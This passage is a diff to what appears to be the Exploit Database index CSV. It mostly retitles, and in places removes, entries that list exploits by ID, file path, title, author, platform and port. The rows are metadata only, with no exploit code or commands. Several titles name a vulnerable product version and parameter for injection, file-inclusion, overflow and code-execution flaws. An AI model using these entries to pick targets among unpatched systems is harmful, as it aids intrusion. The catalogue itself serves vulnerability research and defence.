Inclusion",2007-06-01,"pito pito",php,webapps,0 +30121,platforms/php/webapps/30121.txt,"Prototype of an PHP application 0.1 - ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30122,platforms/php/webapps/30122.txt,"Prototype of an PHP application 0.1 - ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30123,platforms/php/webapps/30123.txt,"Prototype of an PHP application 0.1 - ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30124,platforms/php/webapps/30124.txt,"Prototype of an PHP application 0.1 - ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30125,platforms/php/webapps/30125.txt,"Prototype of an PHP application 0.1 - menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30126,platforms/php/webapps/30126.txt,"Prototype of an PHP application 0.1 - param/param.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 - plugins/phpgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 - index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 - common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30130,platforms/php/remote/30130.txt,"PHP <= 5.2.3 EXT/Session HTTP Response Header Injection Vulnerability",2007-06-04,"Stefan Esser",php,remote,0 30131,platforms/php/webapps/30131.txt,"Buttercup WFM Title Parameter Cross-Site Scripting Vulnerability",2007-06-01,"John Martinelli",php,webapps,0 30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) Cross-Site script Vulnerability",2007-06-01,"Glafkos Charalambous ",php,webapps,0 @@ -27139,7 +27133,7 @@ id,file,description,date,author,platform,type,port 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080 -30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-12-11,metasploit,multiple,remote,80 +30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,metasploit,multiple,remote,80 30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0 30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 @@ -27513,7 +27507,7 @@ id,file,description,date,author,platform,type,port 31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection Vulnerability",2008-09-17,"Hussin X",php,webapps,0 32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0 -32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (64-bit) - Remote Exploit for Linux (Generic)",2014-03-15,sorbo,linux,remote,0 +32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (64-bit) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0 33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability",2014-07-07,c1ph04,hardware,webapps,0 30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure Vulnerability",2007-09-12,Cr@zy_King,php,webapps,0 @@ -28077,7 +28071,6 @@ id,file,description,date,author,platform,type,port 31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager <= 6.1 - 'key' Parameter SQL Injection Vulnerability",2008-02-13,"Nico Leidecker",java,webapps,0 -31190,platforms/linux/dos/31190.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2008-02-13,"Ralf Haferkamp",linux,dos,0 31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web 'agentlist.asp' Multiple SQL Injection Vulnerabilities",2008-02-13,S@BUN,asp,webapps,0 31192,platforms/php/webapps/31192.txt,"Joomla! and Mambo com_model Component - 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 31193,platforms/php/webapps/31193.txt,"Joomla! and Mambo 'com_omnirealestate' Component - 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 @@ -28147,8 +28140,8 @@ id,file,description,date,author,platform,type,port 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80 -31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 -31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 - ABOR Command Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 - CWD Command Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0 @@ -28838,7 +28831,7 @@ id,file,description,date,author,platform,type,port 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80 -31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0 +31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 @@ -29047,7 +29040,7 @@ id,file,description,date,author,platform,type,port 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",2014-03-12,metasploit,windows,remote,20111 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (CSRF/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 -32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA (browse.php file param) - Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 +32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file param) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Include Vulnerabilities",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting Vulnerability",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x visitor/index.php sessionid Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 @@ -29617,7 +29610,6 @@ id,file,description,date,author,platform,type,port 32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 - 'tiki-list_file_gallery.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation Vulnerability",2009-04-02,laurent.desaulniers,php,webapps,0 -33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross-Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0 32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0 @@ -29651,7 +29643,6 @@ id,file,description,date,author,platform,type,port 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0 32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 -32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 @@ -29660,7 +29651,7 @@ id,file,description,date,author,platform,type,port 32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 - CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross-Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",asp,webapps,0 -32899,platforms/windows/dos/32899.py,"Jzip SEH Unicode Buffer Overflow (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 +32899,platforms/windows/dos/32899.py,"Jzip - SEH Unicode Buffer Overflow (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0 32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0 @@ -29885,9 +29876,8 @@ id,file,description,date,author,platform,type,port 33125,platforms/php/webapps/33125.txt,"Joomla! Permis 1.0 ('com_groups') Component - 'id' Parameter SQL Injection Vulnerability",2009-06-28,Prince_Pwn3r,php,webapps,0 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting Vulnerability",2009-06-28,Moudi,php,webapps,0 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 -33128,platforms/linux/remote/33128.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-06-30,"Dan Kaminsky",linux,remote,0 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0 -33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Ivan Sanchez",php,webapps,0 +33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection Vulnerability",2009-07-30,MizoZ,php,webapps,0 33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player <= 10.0.22 and AIR URI Parsing Heap Buffer Overflow Vulnerability",2009-07-30,iDefense,multiple,dos,0 @@ -30437,7 +30427,7 @@ id,file,description,date,author,platform,type,port 33788,platforms/php/webapps/33788.pl,"phpAuthent 0.2.1 - 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps,0 33789,platforms/multiple/remote/33789.rb,"Java Debug Wire Protocol Remote Code Execution",2014-06-17,metasploit,multiple,remote,8000 33790,platforms/windows/remote/33790.rb,"Easy File Management Web Server Stack Buffer Overflow",2014-06-17,metasploit,windows,remote,80 -33791,platforms/arm/local/33791.rb,"Adobe Reader for Android addJavascriptInterface Exploit",2014-06-17,metasploit,arm,local,0 +33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit",2014-06-17,metasploit,arm,local,0 33792,platforms/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - CSRF Vulnerability",2014-06-17,"Blessen Thomas",hardware,webapps,0 33793,platforms/php/webapps/33793.txt,"Kasseler CMS News Module 'id' Parameter SQL Injection Vulnerability",2010-03-23,Palyo34,php,webapps,0 33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 @@ -30537,10 +30527,9 @@ id,file,description,date,author,platform,type,port 33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0 33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 -33895,platforms/cgi/webapps/33895.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"BGA Security",cgi,webapps,20001 33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 -33899,platforms/linux/local/33899.txt,"chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0 +33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0 33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - (.m3u) Buffer Overflow Vulnerability",2010-04-26,Madjix,windows,remote,0 33901,platforms/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 - (.m3u) Buffer Overflow Vulnerability (Metasploit)",2010-04-26,blake,windows,remote,0 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 @@ -30619,7 +30608,7 @@ id,file,description,date,author,platform,type,port 33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 -33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80 +33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80 33991,platforms/php/remote/33991.rb,"WordPress MailPoet - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0 @@ -30858,7 +30847,7 @@ id,file,description,date,author,platform,type,port 34254,platforms/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",hardware,webapps,0 34255,platforms/php/webapps/34255.html,"cPanel 11.25 - Cross-Site Request Forgery Vulnerability",2010-07-03,G0D-F4Th3r,php,webapps,0 34256,platforms/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-07-05,"John Leitch",php,webapps,0 -34257,platforms/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional Multiple Cross-Site Scripting Vulnerabilities",2010-07-06,"Ivan Sanchez",php,webapps,0 +34257,platforms/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (2)",2010-07-06,"Ivan Sanchez",php,webapps,0 34258,platforms/php/webapps/34258.txt,"NewsOffice 2.0.18 - 'news_show.php' Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Parameter Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 34260,platforms/php/webapps/34260.txt,"odCMS 1.07 - 'archive.php' Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 @@ -31108,7 +31097,7 @@ id,file,description,date,author,platform,type,port 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 34538,platforms/php/webapps/34538.txt,"WordPress Plugins Premium Gallery Manager - Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80 -34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0 +34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Python)",2014-09-05,"Robert Kugler",windows,dos,0 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0 34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 DLL Loading Arbitrary Code Execution Vulnerability",2010-08-30,"Ivan Markovic",windows,remote,0 34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 parameters.php device Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0 @@ -31455,7 +31444,7 @@ id,file,description,date,author,platform,type,port 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Upload Vulnerability",2014-10-09,metasploit,php,remote,80 -34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80 +34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer - Remote Command Execution",2014-10-09,metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0 @@ -31525,7 +31514,7 @@ id,file,description,date,author,platform,type,port 35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0 35002,platforms/windows/remote/35002.html,"VLC Media Player 1.1.x Calling Convention Remote Buffer Overflow Vulnerability",2010-11-02,shinnai,windows,remote,0 35003,platforms/multiple/remote/35003.txt,"IBM OmniFind 'command' Parameter Cross-Site Scripting Vulnerability",2010-11-09,"Fatih Kilic",multiple,remote,0 -35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-18,"High-Tech Bridge SA",php,webapps,0 +35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0 35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0 35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Vulnerability",2010-11-19,"Gjoko Krstic",windows,remote,0 @@ -31573,7 +31562,6 @@ id,file,description,date,author,platform,type,port 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 -35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 @@ -31724,7 +31712,7 @@ id,file,description,date,author,platform,type,port 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 -35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 +35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection Vulnerability",2014-11-13,"Claudio Viviani",multiple,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 @@ -31732,7 +31720,7 @@ id,file,description,date,author,platform,type,port 35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0 35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0 35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 -35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 +35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,NLSecurity,php,webapps,0 35229,platforms/windows/remote/35229.html,"Microsoft Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (1)",2014-11-13,yuange,windows,remote,0 35230,platforms/windows/remote/35230.rb,"Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 @@ -31773,15 +31761,15 @@ id,file,description,date,author,platform,type,port 35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 - 'listid' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0 -35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0 +35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass (1)",2014-11-17,"Project Zero Labs",hardware,webapps,0 35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow Vulnerability",2011-01-25,"C4SS!0 